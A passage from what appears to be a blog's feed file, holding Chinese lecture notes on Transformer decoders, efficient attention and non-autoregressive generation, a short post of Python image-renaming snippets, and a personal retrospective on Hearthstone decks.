    ​ 要让机器识别出“机器学习”后,会输出 END。

    Decoder-Non-Autoregressive (NAT)

    png

    png

    ​ 与 AT 不同的是,NAT 并不使用之前时刻的输出,而是一次输入一组 special token。

    • How to decide the output length for NAT Decoder?

      • Another predictor for output length(由其他部分决定输出长度)

      • Output a very long sequence, ignore tokens after END

    • Advantage:

      • parallel
        • AT 一次输出一个 vector(因为上一个输出又作为下一个输入),无法并行处理。而 NAT 可以并行处理,NAT 速度比 AT 更快,在有 self-attention 之前,RNN 和 LSTM 是不能设计 NAT 的。
      • controllable output length
    • 比如在语音合成 (TTS) 任务中,把 Encoder 的输出送入一个 Classifier,预测 Decoder 输出 sequence 的长度。通过改变这个 Classifier 预测的长度,可以调整生成语音的语速。例如,设置输出 sequence 长度 ×2,语速就可以慢一倍。
    • NAT is usually worse than AT (why? Multi-modality 多模态的问题)

    了解更多 NAT:https://youtu.be/jvyKmU40M3c

    Encoder-Decoder

    png

    png

    ​ Encoder 与 Decoder 联系起来的部分:Cross attention。两个输入 $(k,v)$ 来自 Encoder,一个输入 $q$ 来自 Decoder。它计算的是 Encoder 的输出与当前 vector 的 cross attention。

    png

    ​ 用 Decoder 中 Self-attention 层的输出 vector 生成 $q$,与由 Encoder 最后一层输出 sequence 产生的 $(k,v)$ 做运算。

    png

    ​ Cross Attention 实际的展示:Listen, attend and spell: A neural network for large vocabulary conversational speech recognition

​ 这篇论文用的并不是 Transformer,说明先有 cross attention 机制,后才有 self-attention 机制。

    png

    ​ 试想一下,如果你要做一个演讲,虽然记了演讲内容,但还是会担心一上台紧张忘词。怎么办呢?可以把提纲写在卡片上,演讲中看上一眼,就知道接下来要讲什么了。我觉得 cross attention 的作用就有点像这个小卡片,因为它看过整个 sequence,可以给 Decoder 提示信息。

​ cross attention 在早期的 Seq2seq 模型论文中就已经出现,是 Seq2seq 的重要单元。看 seq2seq model with attention(Yannic Kilcher 大神的论文解读视频)的介绍,早期 Seq2seq 模型的 Encoder 和 Decoder 用的是 RNN,attention 用在 cross attention 单元。本来 Decoder 只能利用 Encoder RNN 最后一个时刻的 hidden state,用了 cross attention 之后,之前时刻的 hidden state 也可以看。哪个时刻的 hidden state 对当前 Decoder 输出最相关 (attention),就重点看这个 hidden state,这样模型的性能更好。而 Transformer 架构干脆把 Encoder 和 Decoder 也全部用 attention 来做 (Self-attention),正如论文标题所言 “Attention is all you need”。

​ 你可能会有疑问,Decoder 有很多层 self-attention,每一层 self-attention 的输出都是与 Encoder 最后的输出 sequence 做 cross attention 吗?可以有不同的设计吗?Transformer 论文中是这样设计的,但也可以用不同的设计,现在已经有一些这方面的研究和实验。

    ​ 不同的 Cross Attention 连接方式:[2005.08081] Rethinking and Improving Natural Language Generation with Layer-Wise Multi-View Decoding (arxiv.org)

    Training

    png

    png

    ​ Decoder 的输出 (output) 是一个概率分布,label 是 one-hot vector,优化的目标就是使 label 与 Decoder output 之间的 cross entropy 最小。这其实是一个分类问题。
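
​ 下面是这个分类目标的最小示意(label 与 output 都是虚构的小例子):

import numpy as np

label = np.array([0., 1., 0., 0.])  # one-hot:正确的字是第 1 维
output = np.array([0.1, 0.7, 0.1, 0.1])  # Decoder 经 softmax 后的概率分布
loss = -np.sum(label * np.log(output))  # 交叉熵,这里等于 -log(0.7)
print(round(loss, 3))  # 0.357,output 越接近 label,损失越小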

    png

    ​ Decoder 中,前一个输出又作为下一个输入。使用 Teacher Forcing 方法,Decoder 输入用的是 ground truth value(在训练的时候会给 Decoder 看正确答案)。

​ 测试的时候没有正确答案?可能会有 mismatch 的问题。

    Copy Mechanism

    png

    ​ Copy Mechanism 指在文本生成领域,生成的输出是输入序列元素的复制或者指向。该机制最早由 Vinyals et al.(2015)在 Pointer Network 中提出,所以有时也被称为 Pointer Mechanism 指针机制。

    ​ 有些情况,不需要对输入做改动,比如翻译人名地名,聊天机器人(chat-bot),摘要 (summarization) 等,可以直接复制一部分输入内容。

    ​ 具体的方法:

    • Pointer Network
    • Copy network

    png

    应用:给机器读一篇文章,让机器输出一篇文章的摘要。

    png

    Seq2seq model 如何做到 Copy Mechanism?

    Guided Attention

    png

    ​ 举了一个语音合成 (TTS) 的例子,机器一次说四遍“发财”这个词时,说得挺好,还有抑扬顿挫之感。一次说三遍或两遍“发财”也正常。但是,一次说一遍“发财”时,不知怎的,只有一个音“财”(也许机器不知道怎么处理非常短的句子)。

    png

    ​ 从这个例子可以看到,在处理语音识别 (speech recognition) 或语音合成 (TTS) 等任务时,我们不希望漏掉其中的任何一段内容,Guided Attention 正是要满足这个要求。而 chat-bot, summary 一类的应用在这方面的要求就宽松得多。

​ Guided Attention 是让 attention 的计算按照一定顺序来进行。比如在做语音合成时,attention 的计算应该从左向右推进,如下图中前三幅图所示。如果 attention 的计算顺序错乱,如下图中后三幅图所示,那就说明出了错误。具体方法:Monotonic Attention、Location-aware attention。

    png

    ​ 这其实是一个最优路径的问题。前面介绍,Decoder 每次输出一个变量,假设输出词汇库只有 A, B 两个词汇。每一次都选择最大概率的作为输出,如下图中红色路径所示,这就是 Greedy Decoding。同时,Decoder 的每个输出又是下一时刻输入,如果我们从整个 sequence 的角度考虑,可能第一次不选最大概率,后面的输出概率(把握)都很大,整体更佳,如下图中绿色路径所示。

    ​ 怎么找到最好的路径(图中绿色路径)?穷尽所有选择(路径)吗?这不现实,运算量太大。一个优化方法就是 Beam Search,比如每次存前两个概率大的输出,下一步把这两种输出各走一遍,依此类推,一直到最后。
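
​ 下面是 Beam Search 的一个最小示意(词表只有 A/B,条件概率表是虚构的,beam 宽度取 2):

import numpy as np

probs = {"": {"A": 0.6, "B": 0.4},
         "A": {"A": 0.4, "B": 0.6}, "B": {"A": 0.9, "B": 0.1},
         "AA": {"A": 0.5, "B": 0.5}, "AB": {"A": 0.3, "B": 0.7},
         "BA": {"A": 0.9, "B": 0.1}, "BB": {"A": 0.5, "B": 0.5}}

beams = [("", 0.0)]  # (已生成的序列, 累积 log 概率)
for _ in range(3):  # 假设固定生成 3 步
    cand = [(s + t, sc + np.log(p))
            for s, sc in beams for t, p in probs[s].items()]
    beams = sorted(cand, key=lambda x: -x[1])[:2]  # 每步只保留最好的 2 条路径
print(beams)  # 找到 BAA(0.4*0.9*0.9=0.324),优于贪心路径 ABB(0.6*0.6*0.7=0.252)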

    ​ 但是,用 Beam Search 找到分数最高的路径,就一定是最好的吗?比如下图所示文本生成的例子,使用 Beam Search,后面一直在重复同一个句子。而 Pure Sampling 生成的文本至少看起来还正常。

    Sampling

    png

    ​ Beam Search 有时有用,有时没用。对于有明确答案的任务,比如语音识别,beam search 方法表现好。对于有些创造型任务,比如文本生成,Decoder 是需要一些随机性 (randomness)(论文显示可能出现重复输出同一句话)。

​ 一段在实验室做语音合成 (TTS) 的经历:一开始总做不出理想的效果,和 Google 的研究人员交流,他们提到,测试时 Decoder 要加噪声 (noise)。听上去是不是难以置信?训练时 Decoder 加噪可以理解,让模型 more robust;测试时 Decoder 加噪,这不是给自己找麻烦吗?但是,按这个方法去做,效果确实好!没加噪时,Decoder 产生的声音就像机关枪一样;加噪(加入随机性)之后,产生的声音就接近人声。对于 TTS 或文本生成而言,Decoder 用 Beam Search 找到的最好结果,不见得是人类认为的最好结果(不自然)。加入一点随机性,效果反而更好。正如西谚所言:“Accept that nothing is perfect. True beauty lies in the cracks of imperfection.”(没有事情是完美的,真正的完美可能在不完美之中)

    Optimizing Evaluation Metrics?

    png

​ 能不能直接优化评估指标?

​ 在 homework 中,train 使用 cross entropy loss 做 criterion,要使 output 和 label 在对应 vector 上的 cross-entropy 最小。而评估模型用的是 BLEU score,它是在两个 sequence 上运算的(cross entropy 最小的模型,BLEU score 不一定最大)。因此,validation 挑选模型时也用 BLEU score 作为衡量标准。

    ​ 那么,training 直接就用 BLEU score 做 criterion 岂不更好?

    ​ 问题就在于:BLEU score 没办法微分,不知道要怎么做 gradient descent。实在要做:Reinforcement Learning(RL)。

    ​ 秘诀:”When you don’t know how to optimize, just use reinforcement learning(RL).” 遇到在 optimization 无法解决的问题,用 RL “硬 train 一发”。

    png

    ​ exposure bias:训练和测试时不一致:训练时 Decoder 永远看到正确的东西,而测试时可能看到错误的东西(可能一步错步步错)。

    ​ 有些解决方法:给训练时加一点错误的东西:Scheduled Sampling

    Scheduled Sampling

    png

    Scheduled Sampling(可能会伤害到 transformer 的并行计算能力)

    png

    Class Material

    ##【機器學習 2022】各式各樣神奇的自注意力機制 -Self-attention- 變型

    png

    ​ 本节主要讲 Transformer 的变形:

    png

    ​ 原始的 self-attention 的 Attention Matrix 大小为 $N\times N$,当 $N$ 特别大时计算量很大。

    png

    Notice

    • 对于 transformer 来说,self-attention 只是大的网络架构中的一个 module
• 由上述分析我们知道,self-attention 的运算量跟 N 的平方成正比。当 N 很小的时候,单纯提升 self-attention 的运算效率,可能并不会对整个网络的计算效率有太大的影响。
• 这种问题一般出现在处理图像的任务上,如一张 $256\times 256$ 的图像,其 $N=256\times256=65536$。

    png

​ 用人类知识跳过某些计算:有些位置不需要计算就可以知道数值,于是只选择性地计算 Attention Matrix 中的某些数值,理论上可以减小计算量,提高计算效率。

    Local Attention / Truncated Attention

    png

    ​ 举个例子,比如我们在做文本翻译的时候,有时候在翻译当前的 token 时不需要给出整个 sequence,其实只需要知道这个 token 两边的邻居,就可以翻译的很准,也就是做局部的 attention(local attention)。这样可以大大提升运算效率,但是缺点就是只关注周围局部的值,这样做法其实跟 CNN 就没有太大的区别了。

    Stride Attention

    png

    ​ 如果觉得上述这种 local attention 不好,也可以换一种思路,就是在翻译当前 token 的时候,给它空一定间隔(stride)的左右邻居,从而捕获当前与过去和未来的关系。当然 stride 的数值可以自己确定。

    Global Attention

    png

    ​ global attention 选择 sequence 中的某些 token 作为 special token(比如标点符号),或者在原始的 sequence 中增加 special token。让 special token 与序列产生全局的关系,但是其他不是 special token 的 token 之间没有 attention。

    Add special token into original sequence

    • Attend to every token → collect global information
• Attended by every token → it knows global information(被所有 token attend,从而获得全局信息)

    png

    ​ 对于上述三种 Attention,可以使用 different heads 使用多种 attention 机制。

    png

    Can we only focus on Critical Parts?

    png

​ 上面几种方法都是人为设定哪些地方需要算 attention、哪些地方不需要算,但这样就是最好的方法吗?并不一定。对于 Attention Matrix 来说,如果某些位置的值非常小,我们可以直接把这些位置设为 0,这样对实际预测的结果也不会有太大的影响。也就是说,我们只需要找出 Attention Matrix 中 attention 值相对较大的位置。但是如何找出哪些位置的值非常小/非常大呢?

    Clustering

    png

    png

    ​ 下面这两个文献中给出一种 Clustering(聚类)的方案,即先对 query 和 key 进行聚类。属于同一类的 query 和 key 来计算 attention,不属于同一类的就不参与计算,这样就可以加快 Attention Matrix 的计算。比如下面这个例子中,分为 4 类:1(红框)、2(紫框)、3(绿框)、4(黄框)。在下面两个文献中介绍了可以快速粗略聚类的方法。

    Learnable Patterns

    png

​ 上述我们所讲的都是 $N\times N$ 的 Matrix,但实际来说,这样的 Matrix 通常并不是满秩的,也就是说我们可以对原始 $N\times N$ 的矩阵降维,将重复的 column 去掉,得到一个比较小的 Matrix。

    Do we need full attention matrix?

    png

    png

​ 具体来说,从 N 个 key 中选出 K 个具有代表性的 key,每个 key 对应一个 value,然后跟 query 做点乘,再做 gradient descent 更新参数。

​ 为什么选有代表性的 key 而不选有代表性的 query 呢?因为 query 跟 output 是对应的,减少 query 会让 output 变短,从而损失信息。

    Reduce Number of Keys

    png

    ​ 怎么选出有代表性的 key 呢?这里介绍两种方法:

    png

    ​ 回顾一下注意力机制的计算过程,其中 I 为输入矩阵,O 为输出矩阵,暂时忽略 softmax 过程。

    png

    ​ 矩阵乘法交换计算顺序,得出的结果相同,但是计算量可能不同。

    png

​ 按 $O\approx V(K^TQ)$ 计算(需要 $(d+d')N^2$ 次乘法)要比按 $O\approx (VK^T)Q$ 计算(需要 $2dd'N$ 次乘法)的运算量大得多。
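
​ 可以用 NumPy 验证这一点(随机矩阵,仅演示结合律不改变结果、只改变计算量):

import numpy as np

N, d, dp = 1000, 64, 64  # 序列长度 N、q/k 维度 d、v 维度 d'
Q, K = np.random.rand(d, N), np.random.rand(d, N)
V = np.random.rand(dp, N)
O1 = V @ (K.T @ Q)  # 先算 N×N 的 K^T Q,约 (d+d')N^2 次乘法
O2 = (V @ K.T) @ Q  # 先算 d'×d 的 V K^T,约 2dd'N 次乘法,N 大时便宜得多
print(np.allclose(O1, O2))  # True:两种顺序结果相同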

    png

    ​ 把 softmax 拿回来……

    png

    png

    如果我们可以将 $\exp(q\cdot k)$ 转换成两个映射相乘 $\approx \phi(q)\cdot\phi(k)$ 的形式,那么可以对上式进行进一步简化:

    png

    png

    png

    png

    png

    png

    png

    Realization

    png

    ​ 可以这样去理解,将 φ(k) 跟 v 计算的 vector 当做一个 template,然后通过 φ(q) 去寻找哪个 template 是最重要的,并进行矩阵的运算,得到输出 b。

    那么 φ 到底如何选择呢?不同的文献有不同的做法:

    png

    ​ 在计算 self-attention 的时候一定需要 q 和 k 吗?不一定。在 Synthesizer 文献里面,对于 attention matrix 不是通过 q 和 k 得到的,而是作为网络参数学习得到。虽然不同的 input sequence 对应的 attention weight 是一样的,但是 performance 不会变差太多。其实这也引发一个思考,attention 的价值到底是什么?

    Attention-free

    png

    ​ 不使用 attention 机制处理 seq2seq 问题:

    Summary

    png

    图中横轴为训练速度,纵轴为性能得分。

    • Human knowledge
      • Local Attention,Big Bird
    • Clustering
      • Reformer
    • Learnable Pattern
  • Sinkhorn
    • Representative key
      • Linformer
    • k, q first → v, k first
      • Linear Transformer, Performer
    • New framework
      • Synthesizer

    Extra Material

    -DLHLP 2020- Non-Autoregressive Sequence Generation -由助教莊永松同學講授-

    png

    条件序列生成:语音识别

    png

    其他条件序列生成:

    • Image Caption Generation 给一张图片返回文字描述
    • Machine Translation 机器翻译

Autoregressive model (inference stage)

    png

​ RNN 逐个地吃 token,而且生成下一个 token 的时候要参考当前时间步的 token,因此无论是输入还是输出都比较花费时间。

    ​ 后来有了 BERT,这个时候就可以用 BERT 替换输入模块,这个时候可以直接一次把所有的输入都吃进来,不用一个个的吃,输入的速度是解决了,但是输出还是和 RNN 一样,一个个的往外吐。

    png

    ​ 因此,就想能不能把输出也改成直接吐所有的 token 的模式,这个就是 Non-autoregressive model 的目标。

What's the problem?

    png

要实现上面提出的目标是有难度的,借用之前 ML 课程中讲过的一个例子来说:
有一个 Text-to-Image 的任务,就是给一段文字,让模型为文字配一张图片。传统上使用有监督的方式进行训练,例如下图中给出的文字是奔跑的狗,那么模型生成的图片要和 ground truth 越接近越好。

    png

​ 由于各个输出神经元之间没有相互联系,模型的输出又想像这张图片,又想像那张图片,结果把几种可能叠加在了一起。

    png

    ​ 假如我们使用 Non-Autoregressive Sequence Generation 的方式来进行 translation。输入是【Hello!】,输出可以看到有好几种合理的翻译。可以看到输出第一个 token 中【哈】【你】几率都相等,都为 50%,第二个 token 同理。那么在输出整个 sequence 的时候就有可能是 你喽/哈好。

    ​ 明显这两个都是错误的翻译,但是都是有可能被模型 sample 出来的结果。我们将这个问题称为:multi-modality problem,同一个输入,可能对应多个输出,那么 Non-Autoregressive 模型就会把各种可能的输出进行叠加,导致错误。

    png

| generate target / methods | Image | Text |
| --- | --- | --- |
| naive approach | Deconvolution layer + L2 loss,求均值,效果差 | non-autoregressive decoder,multi-modality problem 是本文重点要解决的问题 |
| autoregressive | PixelRNN、VQVAE-2,效果好 | autoregressive decoder,成熟,缺点是一个个输出效率低 |
| Generative Adversarial Networks / non-auto model | 效果好 | 文字应用还不成熟,待研究 |

    Vanilla NAT (Non-Autoregressive Translation)

    png

    Fertility

    png

    Sequence-level knowledge distillation

    png

    png

    NPD

    png

Autoregressive model w/ teacher forcing

    png

    Evolution of NAT

    png

NAT with Iterative Refinement

    png

    Mask-Predict

    png

    png

    Insertion Transformer

    png

​ Partially Autoregressive Model,不是纯正的 NAT。该模型会在每两个字之间做预测,判断是否需要插入新字。

    png

    png

    Multiple target words to predict?

    png

    png

    KERMIT

    png

这个算法相对于 Insertion Transformer 而言,是将 Encoder 和 Decoder 合并在了一起。

    png

    png

    Levenshtein Transformer

    png

    ​ 这个模型是在插入的基础上加入了删除功能,模型如下图所示:

    png

    可以看到输入经过 encoder 之后得到初始的输出要经过三个 Decoder:

    • 第一个 Decoder 是一个删除分类器,判断是否需要删除当前单词;
    • 第二个 Decoder 是一个插入分类器,判断是否要在当前单词与单词之间插入单词,如果插入则生成一个占位符【PLH】place holder;
    • 第三个 Decoder 是 token 分类器,根据【PLH】的位置预测对应的单词。

    ​ 这个模型训练就是采用上面提到的从另外一个模型学习的方法(knowledge distillation)。具体算法称为:Levenshtein Distance Algorithm

import Levenshtein
Levenshtein.distance("ABCEFGHJJ", "ABCDEFGHI")
3

Levenshtein.editops("ABCEFGHJJ", "ABCDEFGHI")
[('insert', 3, 3), ('delete', 7, 8), ('replace', 8, 8)]

    png

    CTC

    png

    ​ CTC 也是 Non-Autoregressive 模型,只不过用在语音识别上;

​ 语音识别基本没有 multi-modality 问题,即一段语音一般不会对应多个差异很大的合理结果。(特殊情况当然也有,不过加入 LM 可以解决,例如有人说:城市/程式还不错!)

    Block Decoding

    png

    png

    Knowledge Distillation in NAT

    png

​ 最后给出 NAT 对 Autoregressive 模型进行 Knowledge Distillation 后效果提升的研究。语料中原文为英文,译文有 de(德文)、es(西班牙文)、fr(法文)。Autoregressive 模型的翻译结果非常清楚,一句话翻译出来是三种目标文字中的一种,不会混乱(下图中第一幅图里每一个点代表一个句子),但是 NAT 模型就不行;最后以 Autoregressive 模型为老师进行学习后,NAT 可以获得很好的效果。

    Reference

    png

    png

    Pointer Network

​ Pointer Network 是 [seq2seq 模型](https://www.zhihu.com/search?q=seq2seq 模型&search_source=Entity&hybrid_search_source=Entity&hybrid_search_extra={“sourceType”%3A"answer"%2C"sourceId"%3A1187307191}) 的一个变种。它不是把一个序列转换成另一个序列,而是产生一系列指向输入序列元素的指针。最基础的用法是对可变长度序列或集合的元素进行排序。

​ 传统的 seq2seq 模型无法解决输出序列的词汇表随输入序列长度改变而改变的问题。在某些任务中,输出严格依赖于输入,或者说输出只能从输入中选择。例如输入一段话,提取这句话中最关键的几个词语;又或是输入一串数字,输出对这些数字的排序。这时如果使用传统 seq2seq 模型,就忽略了“输出只能从输入中选择”这个先验信息,Pointer Networks 正是为了解决这个问题而提出的。

    Pointer Network

    png

    ​ pointer network 是一种对 attention 机制的应用。它的输出是输入的子集(相当于输出的是输入序列中部分元素的 copy)

    引例:使用 NN 求解一堆散点的凸包,输入是一堆点的坐标,输出是一个序列,每个元素表示选择了第几个输入的点。

    png

    ​ 首先考虑使用 seq2seq,但是会存在一个问题,因为我们输出的“候选集”的长度应该是 1~输入元素的个数,而输入的点的个数是不确定的,所以这个输出的候选集是变的(也就是每一个输出时间步中,softmax 输出的种类数是变化的)。(注意,这个候选集指的不是序列的长度,序列的长度是构成凸包的点的个数)在 seq2seq 模型中,只有输出序列的长度是变的,而这个 softmax 的类别数是固定的。

    png

    ​ 解决方法,用 attention 机制对每一个输入元素做 attention,取这个 attention weight 来做 softmax,然后取 argmax 得到当前时间步的输出。为什么这样做 work:因为输出每一步会对输入的所有元素去 attention,这个 attention vector 的维度正好等于输入的个数,所以每个时间步的分类个数就等于输入元素数。
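
​ 下面是 Pointer Network 单步输出的最小示意(编码向量与 query 都用随机数代替,仅演示“分类数恰好等于输入个数”这一点):

import numpy as np

n_inputs, d = 5, 16  # 输入元素个数(可变)、向量维度
enc = np.random.rand(n_inputs, d)  # 每个输入元素的编码(虚构)
query = np.random.rand(d)  # 当前解码时间步的 query(虚构)
scores = enc @ query  # 对每个输入元素算一个 attention 分数
attn = np.exp(scores) / np.exp(scores).sum()  # softmax:维度恰好等于输入个数
print(np.argmax(attn))  # 当前时间步“指向”第几个输入元素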

    ​ 用 $(x_0,y_0)$ 表示 END,当 argmax 的结果是 $(x_0,y_0)$ 时,结束。

    Applications - Summarization

    png

    ​ 其他应用:summary 给一段文章,返回它的简介。

    ​ 之所以加入 pointer network 在这个任务上可以比 seq2seq 更好,一个原因是,文章中一般会出现一些人名地名,而这些东西可能在我们的词汇表里没有。另外,pointer network 可以直接从 input 中挑关键词出来,所以更适合做 summary。

    ​ 上面的方案是传统 seq2seq + pointer network。特点是学出来的一个 weight $p_{gen}$,表示 pointer network 和 seq2seq 分布结果的加权,求和之后得到最后的分布。

    png

    ​ 其他应用:机器翻译/chat bot,思想就是从输入中直接取一部分(这部分可能不在词汇库中)

    ]]>
    @@ -8404,7 +8404,7 @@ /posts/Python-%E4%B8%80%E4%BA%9B%E6%88%91%E5%B8%B8%E7%94%A8%E7%9A%84%E5%B0%8F%E6%93%8D%E4%BD%9C/ - 前言
    + 前言

​ 把一些我常用的小操作记录下来,省得用一次上网查一次改一次 orz

    正文

    输出一段 markdown 图片代码

for i in range(5):
    print('![png](E1.' + str(i + 1) + '.png)\n')
    ![png](E1.1.png)

    ![png](E1.2.png)

    ![png](E1.3.png)

    ![png](E1.4.png)

    ![png](E1.5.png)

    批量重命名

import os

path = r'd:\Pictures\QQplayerPic'
label = 'E5'
for index, file in enumerate(os.listdir(path)):
    os.rename(os.path.join(path, file), os.path.join(path, label + '.' + str(index + 1)) + ".png")

    批量重命名,并将重命名的文件录入剪贴板

import os
import pyperclip

path = r'd:\Pictures\QQplayerPic'
label = 'E5'
copy_text = ""
for index, file in enumerate(os.listdir(path)):
    copy_text += '![png](' + label + '.' + str(index + 1) + '.png)\n\n'
    os.rename(os.path.join(path, file), os.path.join(path, label + '.' + str(index + 1)) + ".png")
pyperclip.copy(copy_text)
print(copy_text)
    ![png](E5.1.png)

    ![png](E5.2.png)

    ![png](E5.3.png)

    ![png](E5.4.png)

    ![png](E5.5.png)

    ]]>
    @@ -8479,7 +8479,7 @@ /posts/Game-%E7%BB%99%E8%A6%81%E5%85%B3%E9%97%A8%E7%9A%84%E7%82%89%E7%9F%B3%E4%B8%8A%E4%B8%AA%E9%A6%99/ - 前言
            
    + 前言
            

​ 听说了暴雪要退出中国的消息,那就给我本科经常玩的炉石上个香吧!记录一下玩过的种种上分/划水卡组,这篇文章一共收录了 40 套!

    ​ 由于我已经很久没有接触它了,一些卡组是凭借记忆重组的,可能会有点误差。出于我对游戏优秀的理解和缺卡,一些构筑并不是当时最主流的。

    jpg

    正文

    1. 古神的低语

    jpg

    ​ 第一次入坑是 16 年,在高一的美术课上无聊看别人打的很 high,就入坑了😅。由于那时候未成年还上网找了个身份证逃避防沉迷验证。当时最新的版本是《古神的低语》,由于没什么卡就只能玩送的克苏恩了,由于核心组件基本都中立卡任何职业都组了一套克苏恩,出于术士优秀的英雄技能,玩的时间最多。

    ​ 第一次入坑大概玩了一个月,某天由于一阵乱输气得我卸载了游戏😅。

    2. 砰砰计划

    jpg

    ​ 高考完后再次入坑,由于已经成年了就换回自己的身份证做大号,之前玩了一段时间的号就变成小号了😅。大学军训的某一天傍晚开包开了一张金色的“神奇的威兹班”,这张卡可以让我体验各种职业的全金卡组!真是太幸运了!结果当晚军训演唱的时候丢了个充电宝😅。就当是这张卡换了个充电宝吧。

    ​ 毕竟这是一款网游,而我一向不喜欢往网游里氪金,而网游里没钱又不能获得好的游戏体验。也正是这张卡和盛成日带我玩才没有弃坑😅。

    jpg

    ​ 国庆假期中开了张金色传说,再加上之前拆解了一些卡收集了一些粉尘合了一张嗜月者巴库,我的第一套上分卡组——奇数骑诞生了!虽然这在当时是 t1 卡组,可一直摇报告还是有点无聊😅。

    jpg

    ​ 后来又攒了尘合了火车王和邪脊吞噬者,第二套上分卡组——奇数贼诞生了!

    jpg

    ​ 既然有了巴库和火车王就顺带把奇数猎也做了出来😅。

    3. 拉斯塔哈的大乱斗

    jpg

    ​ 后来临近期末考试,盛成日说他要好好学习就直接把号借给我玩。由于玩奇数三兄弟的快攻实在是太无聊,在盛成日的号上玩起了法术猎,不得不说是个很有节奏感的卡组。

    jpg

    ​ 又花了盛成日的 2400 粉尘合了巫妖王和山岭巨人,这套卡组后手可以 3 费下山岭巨人,体验巨人骑脸的快感,后来盛成日还拿这套卡组打比赛了。

    jpg

​ 在平衡补丁后,等级提升、冷血、猎人印记、翡翠滋养、激活等法术遭到一阵削弱。

    ​《拉斯塔哈的大乱斗》是一个很弱的版本,几乎没有什么新卡能影响环境,平衡补丁又削弱了很多人的“信仰卡组”导致很多人弃坑,炉石在当时算是一个低谷,而我感觉对刚入坑/回坑的人还是蛮友好,由于卡组的构筑变化不大使得新手有较长的时间攒出一套主流的卡组。

    ​ 这时候野兽猎成为了新的 t1 卡组!主流的构筑中是携带追踪术而不是宝石鹦鹉,而我那时由于追踪术要弃牌就非常不喜欢,选择了宝石鹦鹉,增加了 1 费野兽数量更好地配合雷鸣刺喉龙。主流的构筑也没有山猫之神,而我当时想玩玩为数不多的橙卡就带上了。

    jpg

    ​ 玩了一个寒假攒的尘合了张狼王。由于当时的主流主播都是玩狂野模式(可能是当时标准模式实在是太无聊了吧),我也就跟风组了套便宜强力的偶数萨并成功打到 5 级,此后很长一段时间都在狂野混了。

    4. 暗影崛起

    jpg

    ​ 荣誉室后获得了更多的尘!当时非常喜欢奇偶卡组就合了套偶数术,偶数萨和偶数术混合着用保证每个月都打到 5 级混个低保。

    5. 奥丹姆奇兵

    jpg

    ​《奥丹姆奇兵》送了张萨满任务,觉得林彻和沙德沃克合了不亏就组了一套完整的任务萨。这套卡组可操作性非常不错!

    ​ 后来拿这套卡组去学校比赛打了个酱油回来。

    jpg

    ​《奥丹姆奇兵》给了很多奥秘法的组件以压制在狂野肆虐的奇迹法,由于我缺卡就用盛成日的号玩了一段时间,结果一阵乱杀打进 4 级。

    jpg

    ​ 看别人玩德鲁伊一直觉得很强,再加上之前一直没怎么玩过就把暑假攒的所有尘合了一套青玉德,结果发现它好像谁都打不过。

    jpg

    ​ 有了艾雅黑掌就合了套青玉萨,这是套娱乐卡组所以玩的不多,此时佐拉和洛欧塞布也合了出来,决定慢慢攒出宇宙的组件。

    6. 巨龙降临

    jpg

    ​《巨龙降临》版本给了海盗战很多组件,于是合了套奇数战抓抓快攻。但是这卡组打慢速卡组游戏体验真是太差了!看到牧师术士和德鲁伊都想直接跑路。

    jpg

    ​ 合了张帕奇斯组了套奇数贼用于上分。

    7. 迦拉克隆的觉醒

    jpg

    ​ 然后就是迎来史上最长的寒假!这段时间里玩了非常久的炉石,想想还真是颓废啊。

​ 使用奥秘法、偶数术、奇数贼、海盗战尝试冲传说,发现久攻不下,心态一度炸裂。最后返璞归真,用偶数萨冲上了游戏中第一次传说。

    jpg

    ​ 又是要退环境的时候,靠荣誉室又赚了一波尘。在退环境之前短暂地把一些削弱的卡回调了,其中就有我最喜欢的橙卡“科学狂人”砰砰博士!

    ​ 发现再合几张宇宙组件就能组一套很豪华的宇宙战,合!

    ​ 这个卡组遇到内战还真是比膀胱,打一局能快半小时。

    jpg

    ​ 宇宙猎算得上是我最喜欢的卡组之一。节奏感优秀,冷门、豪华而且强力。

    ​ 好长一段时间,用这套卡组优开偶数萨奇数骑奥秘法轻松上了传说。

    jpg

    ​ 没事玩盛成日的号随便组了套蓝龙术,思路是用 439 拖回合时长再用一堆直伤法术偷鸡。结果盛成日还特别喜欢玩,用这套卡组修修补补上了好几次传说。

    jpg

    ​ 由于盛成日特别喜欢玩慢速 OTK 卡组,特意合了套爆牌贼破坏他的游戏体验。

    jpg

    ​ 合了张大帝本来想玩宇宙术,结果组件还差一点就顺便组了套沙雕卡组——野猪术!思路是送掉邪魔仆从,最后使用送葬者安德提卡、力量的代价和残酷集结给小野猪加一堆攻击斩杀对手。

    8. 外域的灰烬

    jpg

    ​ 炉石迎来新的职业恶魔猎手,奇数瞎在狂野相当炸裂,本身奇数卡组框架已经集齐就整了一套。但是那时候对极限快攻比较腻就没怎么玩。

    jpg

    ​ 由于奇数瞎在狂野非常猖狂,但我就算打不过也不想加入,宇宙猎对奇数瞎也仅仅是小优,开始寻找其他卡组以抗衡奇数瞎。尝试了 JK 战,在和奇数瞎互相锤脸后发现锤不过对面。

    jpg

    ​ 于是我就想着使用 JK 战在发现锤不过奇数瞎的时候能不能使用雷诺耍赖皮?原创了一套宇宙 JK 战发现效果非常好,打着打着就又传说了。

    jpg

    ​ 这个版本的弃牌术也比较猖狂,本着师夷长技以制夷的想法,拿着小号不多的尘组了套弃牌术,结果一阵连胜。

    9. 通灵学园

    jpg

    ​ 由于大号已经 11 星,上传说并不是一件难事。但是由于这个版本黑眼术十分猖狂导致我游戏体验极差。之前的卡组差不多跟不上节奏了。

    ​ 本着师夷长技以制夷的想法,拿着小号组了套黑眼术,导致我游戏体验极好。

    10. 疯狂的暗月马戏团

    jpg

    ​ 这个版本给狂野经典卡组补充了很多组件,而我又很幸运地开到了它们。

    jpg

    ​ 大哥牧的成本越来越低,也就合了一套,发现游戏体验也就那样。

    jpg

    ​ 这也是我原创的一套我很喜欢的卡组!集快攻控制 OTK 的思想于一身。前期当作奥秘法用,发现打不过就用宇宙组件耍赖皮,后期久攻不下就使用大法师-幻觉药水回手,第二回合大法师-克苏恩面具一波带走。

    11. 暗月竞速赛

    jpg

    ​ 由于疫情期间玩得特别多,攒了一堆尘,刚好能组一套超豪华的宇宙法,其实实力并不强力。

    jpg

    ​ 枯木逢春宇宙术!由于我刚好开到了提克特斯就又能继续 happy 了。

    jpg

​ 宇宙牧由于几乎没有劣势对局,成为了当时最主流的卡组之一。当时应该是我炉石水平最高的一段时间,大概打到了国服 200 名左右,甚至都能遇到炉石界许多很有名的大神。由于国服顶端卡组分布特殊,甚至要靠自己的理解特化构筑,以针对特定的卡组。

    jpg

    ​ 模仿狗贼的构筑合了一套宇宙防战,带了一堆针对卡针对环境中肆虐的宇宙牧黑眼术弑君贼,终结手段是血骨傀儡-恩佐斯。
